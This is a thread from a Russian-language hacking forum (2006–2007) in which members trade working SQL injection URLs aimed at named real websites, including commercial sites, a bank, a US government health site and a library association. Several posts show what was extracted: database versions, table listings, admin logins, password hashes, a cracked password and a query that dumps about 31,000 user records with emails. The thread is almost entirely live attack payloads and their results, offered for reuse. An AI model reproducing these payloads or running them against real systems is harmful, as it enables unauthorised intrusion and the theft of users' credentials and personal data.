SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Никаких извращений не будет, после того как переберу всю тему, поставлю поисковый скрипт- там и будем чекать
     
  2. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    Зачем вы тратите свои время и усилия? Прежде чем просто постить в тему надо на гугле делать проверку типа

    иногда прокатывает только

    А тем кто постит бояны минус ставить. И всё. В правила темы внести это предупреждение
     
    1 person likes this.
  3. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    www.stroyzona.com
    Code:
    http://www.stroyzona.com/warelist.php3?id=-1800+union+select+1,concat(version(),char(58,58),database(),char(58,58),user()),3/*
    www.rocit.ru
    Code:
    http://www.rocit.ru/news/shownews.php3?id=-30598+union+select+1,2,3,4,5,6,7,concat(version(),char(58,58),database(),char(58,58),user()),9,10/*
     
  4. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Code:
    http://coce.samhsa.gov/cod_resources/index.aspx?obj=42+or+1=@@version--
    
    Можно покавырять, но мне не хочиться!
    me/ боиться!

    В процесе поиска:
    Code:
    http://www.terjemar.net/dict5.php?baseid=-928+union+select+1,2,3/*
    для тех у кого много трафа!
     
  5. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://director-online.com/buildArticle.php?id=-2+union+select+1,2,3,4,5,6,7,8+from+user/*
    
     
  6. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Хочу добавить по Этому Сайтику....

    Нашёл ещё 1 табличку: phorum_users
    Запрос
    Code:
    director-online.com/buildArticle.php?
    POST: id=-2+UNION+SELECT+1,2,3,4,5,concat(username,char(58),password),7,8+FROM+phorum_users/*
    
    =========
    Для id=1
    username: !aaf
    hash: 1b207465eac83b5d4b12e335faa0b53a
    crackHash: paula

    ========


    Также Колонки для этой таблички
    Code:
    id
    name
    username
    password
    emai
    webpage
    image
    icq
    aol
    yahoo
    msn
    jabber
    signature
    hide_email
    permission_level
    max_group_permission_level
    lang
    password_tmp 
    
     
    #1926 limpompo, 16 Apr 2007
    Last edited: 16 Apr 2007
    1 person likes this.
  7. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    один из кинотеатров Питера =)
    kolizey.spb.ru
    Code:
    http://www.kolizey.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(login,0x3a,password,0x3a,email),18+from+user/*&lang=eng
    юзер:пасс:мыло

    там еще есть таблица 'guestbook', колонка вроде 'email', но я не уверен, копаться не стал.
     
  8. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    www.efimov-partners.ru
    Code:
    http://www.efimov-partners.ru/vacancy/?rubric=-47+union+select+concat(version(),char(58,58),database(),char(58,58),user())/*
    www.santechmart.ru
    Code:
    http://www.santechmart.ru/print.php?id=-1+union+select+concat(version(),char(58,58),database(),char(58,58),user())/*
    www.yurclub.ru
    Code:
    http://www.yurclub.ru/catalog/geo.list.php?s=-11000+union+select+1,concat(version(),char(58,58),database(),char(58,58),user())/*&r=0&PHPSESSID=d974a3bb28fedf99bf678190478bb00b

    www.ladofon.ru
    Code:
    http://www.ladofon.ru/news_detail.php?news_id=-69+union+select+1,2,3,concat(version(),char(58,58),database(),char(58,58),user()),5,6,7,8/*
    http://www.staldveri.ru
    Code:
    http://www.staldveri.ru/products/popup.php?id=-2+union+select+1,concat(version(),char(58,58),database(),char(58,58),user()),3,4,5,6,7/*
    www.spbgid.ru
    Code:
    http://www.spbgid.ru/index.php?type=-1+union+select+1,convert(concat(version(),char(58,58),database(),char(58,58),user())%20using%20cp1251),3/*
     
  9. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Достали в игрушки играть давайте.

    http://quest.mini-rinok.ru/index.php?id=1
    http://quest.mini-rinok.ru/index.php?id=2
    http://quest.mini-rinok.ru/index.php?id=2-1

    Кто составит корректный запрос +20 от меня.
     
  10. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    http://www.prokredo.ru/collegefaculty.php?id=50%20union%20select%201,concat(login,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14%20FROM%20kredo_admins/*
    -------------------------------
    sql password
    mooncat login
    ------------------------------
    TABLES:
    Code:
    CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE,  ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, TABLES,
    TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES,VIEWS, kredo_activity,
    kredo_admins, kredo_albums, kredo_article, kredo_college, kredo_company, kredo_contacts, kredo_doc, kredo_faculty, kredo_links, kredo_media, kredo_news, kredo_opinions, kredo_pages, kredo_partner, kredo_photo, kredo_presskit, kredo_publications, kredo_questions, kredo_represents,kredo_sections, kredo_students, kredo_vacancy, prokredo_forum_auth_access, prokredo_forum_banlist, prokredo_forum_categories, prokredo_forum_config, prokredo_forum_confirm, prokredo_forum_disallow, prokredo_forum_forum_prune, prokredo_forum_forums, prokredo_forum_groups, prokredo_forum_posts, prokredo_forum_posts_text, prokredo_forum_privmsgs, prokredo_forum_privmsgs_text, prokredo_forum_ranks, prokredo_forum_search_results, prokredo_forum_search_wordlist, prokredo_forum_search_wordmatch, prokredo_forum_sessions, prokredo_forum_sessions_keys, prokredo_forum_smilies, prokredo_forum_themes, prokredo_forum_themes_name, prokredo_forum_topics, prokredo_forum_topics_watch, prokredo_forum_user_group, prokredo_forum_users, prokredo_forum_vote_desc, prokredo_forum_vote_results, prokredo_forum_vote_voters, prokredo_forum_words
    ---------------
    COLUMNS:
    Code:
     CHARACTER_SET_NAME, DEFAULT_COLLATE_NAME, DESCRIPTION, MAXLEN, COLLATION_NAME
    http://quest.mini-rinok.ru/index.php?id=1
    cash, а ты уверен что там можно что-то сделать?
     
  11. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Уверен.
    )))))))))))))))))))))))))))
    Что поставили кавычку нечего не получилось )))
     
  12. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    я её сделал когда там ещё недостаточная фильтрация была),а потом нет.
    Мне киборг подскзывал как там делать надо, но я так и не смог((, видимо мало над этим думал, надо будет как нибудь на досуге этим занятся.

    несмог таблицы подобрать.
    префикс rabotamania_
     
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ^^куда уж нам до "гуру"^^
     
  14. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    [ cash ],
    держи
     
    2 people like this.
  15. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    ну и я заодно подкину
    http://alia.org.au/publishing/incite/2006/06/print.html?ID=68%20union%20select%201,2,3,4,5,6,7,8,9,10,concat(password,char(58),user),12,13,14,15,16,17%20from%20mysql.user/*
     
  16. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    смотри там и киборг побывал:

    Code:
    http://quest.mini-rinok.ru/index.php?id=1%0bunion%0bselect%0bconcat(username,char(58),password)%0bfrom%0busers/*

    k1b0rg:599745
     
    2 people like this.
  17. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    хах,типа авторские права на скули? :)

    http://www.invest-em.ru/it/lib/article.php?id=-391+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3/*

    http://www.lineonline.ws/detail.php?id=14756'+union+select+1, 2/*

    http://www.brunet.ws/detail.php?id=6071'+union+select+1, 2/*
    сёдня както маловато (
     
  18. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    VisionLearning.com
    31000 users

    Code:
    http://www.visionlearning.com/library/flash_viewer.php?oid=-1+union+select+1,concat(username,0x3a,password,0x3a,email),3,4,city+from+users+limit+31000,31001/*

    Code:
    http://kras.ru/pop_news.php?winid=-1+union+select+COLUMN_NAME,2,3,4+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=char(108,101,103,97,108)/*
    Code:
    http://ara.com.ua/onenews.php?oid=-1+union+select+1,2,3,user(),5,6,database()/*
     
    1 person likes this.
  19. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    какой-то банк! помогите подобрать таблицу
    http://www.nskbl.ru/tariff/plans/?id=7&data_id=900-9%20union%20select%201,2,3,4,5,6/*
     
  20. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Ну что, кэш, где твои +20? шутка, можешь не ставить.
     
    1 person likes this.
Thread Status:
Not open for further replies.